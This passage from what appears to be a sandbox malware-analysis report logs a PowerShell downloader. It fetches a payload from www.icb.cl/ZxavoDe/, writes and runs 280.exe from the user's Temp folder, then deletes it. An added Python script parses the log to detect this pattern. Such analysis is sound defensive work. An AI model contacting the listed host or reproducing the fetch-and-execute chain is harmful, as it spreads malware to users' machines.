Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 4096 True 13
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 4268 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 4616 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 5136 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 21484 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 5508 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 4664 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 5840 True 1
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 1732 True 1
Fn
Data
Delete C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe - True 1
Fn
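The File table above records the whole life of the dropped binary in one process: two `Create` calls on `280.exe` with `GENERIC_WRITE`, a series of `Write` calls, and a `Delete`. The script below is an added example, not part of the VMRay report. It parses a constructed sample of rows copied from this table (the `Fn` / `Data` log-link rows are included so the parser is seen to skip them) and assumes that the `Count` column means the number of identical calls grouped into one row, so bytes written per row are `size` times `Count`. Under that assumption the writes sum to 106,496 bytes, exactly the 104.00 KB the Created Files table reports for the second `280.exe` entry; the first entry, at 0.00 KB, carries the MD5/SHA1/SHA256 of empty input, which is what you get when a file is hashed right after `Create` and before any `Write` has landed. The script checks both and flags the drop-and-clean-up pattern (executable created for writing under the user's Temp directory and later deleted by the same process).

```python
"""Reconstruct the dropped file from VMRay 'Host Behavior / File' rows.

Added example, not part of the VMRay report.  Sample rows are copied from
the powershell.exe file-operation table on this page.
"""
import hashlib
import re

# Constructed sample: a subset of rows from the report's File table.
SAMPLE_OPS = r"""
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe type = file_type True 2
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 4096 True 13
Fn
Data
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 4268 True 1
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 4616 True 1
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 5136 True 1
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 21484 True 1
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 5508 True 1
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 4664 True 1
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 5840 True 1
Write C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe size = 1732 True 1
Delete C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe - True 1
Fn
"""

ROW = re.compile(
    r"^(?P<op>Create|Get Info|Open|Read|Write|Delete)\s+(?P<path>\S+)\s+"
    r"(?P<info>.*?)\s+(?P<ok>True|False)\s+(?P<count>\d+)$"
)
SIZE = re.compile(r"\bsize = (\d+)")
# User temp directory as seen in this report; compared case-insensitively.
USER_TEMP = re.compile(r"^c:\\users\\[^\\]+\\appdata\\local\\temp\\", re.I)


def parse_op(line):
    """Parse one file-operation row; 'Fn'/'Data' link rows and headers give None."""
    m = ROW.match(line.strip())
    if not m:
        return None
    return {"op": m["op"], "path": m["path"], "info": m["info"],
            "ok": m["ok"] == "True", "count": int(m["count"])}


def bytes_written(lines):
    """Total bytes written per path: each Write row's size times its Count (assumed meaning)."""
    totals = {}
    for line in lines:
        r = parse_op(line)
        if r and r["op"] == "Write" and r["ok"]:
            m = SIZE.search(r["info"])
            if m:
                key = r["path"].lower()
                totals[key] = totals.get(key, 0) + int(m.group(1)) * r["count"]
    return totals


def dropped_then_deleted(lines):
    """Executables created for writing under the user's Temp dir and later
    deleted by the same process: the drop-and-clean-up pattern in this table."""
    created, deleted = set(), set()
    for line in lines:
        r = parse_op(line)
        if not r or not r["ok"]:
            continue
        p = r["path"].lower()
        if not (USER_TEMP.match(p) and p.endswith(".exe")):
            continue
        if r["op"] == "Create" and "GENERIC_WRITE" in r["info"]:
            created.add(p)
        elif r["op"] == "Delete" and p in created:
            deleted.add(p)
    return sorted(deleted)


def empty_file_digests():
    """Digests of zero bytes: what Created Files shows for a file hashed
    right after Create, before any Write has landed."""
    return {a: hashlib.new(a, b"").hexdigest() for a in ("md5", "sha1", "sha256")}


if __name__ == "__main__":
    lines = SAMPLE_OPS.splitlines()
    for path, total in bytes_written(lines).items():
        print(f"{path}: {total} bytes = {total / 1024:.2f} KB")
    print("drop-and-delete:", dropped_then_deleted(lines))
    print(empty_file_digests())
```

Note that this table alone shows the file being written and removed; whether it ran in between is a question for the process tree, which is outside this part of the report.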
Registry (221)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 6
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 4
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 6
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 6
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Process (2)
Operation Process Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe show_window = SW_SHOWNORMAL True 1
Fn
Get Info - type = PROCESS_BASIC_INFORMATION True 1
Fn
Module (5)
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe, size = 2048 True 1
Fn
Get Filename - process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe, size = 260 True 2
Fn
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
Map - process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE True 1
Fn
User (1)
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (9)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XABNCPUWKW True 1
Fn
Get Info type = Operating System True 6
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (33)
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 10
Fn
Create mutex_name = Global\.net clr networking False 1
Fn
Create mutex_name = Global\.net clr networking True 5
Fn
Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Release mutex_name = Global\.net clr networking True 1
Fn
Release mutex_name = Global\.net clr networking True 10
Fn
Release mutex_name = Global\.net clr networking True 5
Fn
Environment (109)
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 99
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\kFT6uTQW True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\kFT6uTQW True 1
Fn
Get Environment String name = COmSpeC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Get Environment String name = temp, result_out = C:\Users\kFT6uTQW\AppData\Local\Temp True 2
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Network Behavior
DNS (2)
Operation Additional Information Success Count Logfile
Resolve Name host = comprealm.net, address_out = 184.168.46.18 True 1
Fn
Resolve Name host = www.icb.cl, address_out = 190.196.2.210 True 1
Fn
HTTP Sessions (1)
Information Value
Total Data Sent 68 bytes
Total Data Received 104.34 KB
Contacted Host Count 1
Contacted Hosts www.icb.cl
HTTP Session #1
Information Value
Server Name www.icb.cl
Server Port 80
Data Sent 68
Data Received 106844
Operation Additional Information Success Count Logfile
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Open Connection protocol = http, server_name = www.icb.cl, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /ZxavoDe/ True 1
Fn
Send HTTP Request headers = host: www.icb.cl, connection: Keep-Alive, url = www.icb.cl/ZxavoDe/ True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 65536, size_out = 4616 True 1
Fn
Data
Read Response size = 65536, size_out = 1452 True 1
Fn
Data
Read Response size = 65536, size_out = 7260 True 1
Fn
Data
Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Read Response size = 65536, size_out = 1452 True 1
Fn
Data
Read Response size = 65536, size_out = 7260 True 1
Fn
Data
Read Response size = 65536, size_out = 5808 True 1
Fn
Data
Read Response size = 65536, size_out = 1452 True 3
Fn
Data
Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Read Response size = 64736, size_out = 2904 True 1
Fn
Data
Read Response size = 61832, size_out = 23608 True 1
Fn
Data
Read Response size = 38224, size_out = 2920 True 1
Fn
Data
Read Response size = 35304, size_out = 2920 True 1
Fn
Data
Read Response size = 32384, size_out = 2920 True 1
Fn
Data
Read Response size = 29464, size_out = 1452 True 1
Fn
Data
Read Response size = 28012, size_out = 1468 True 1
Fn
Data
Read Response size = 26544, size_out = 1452 True 1
Fn
Data
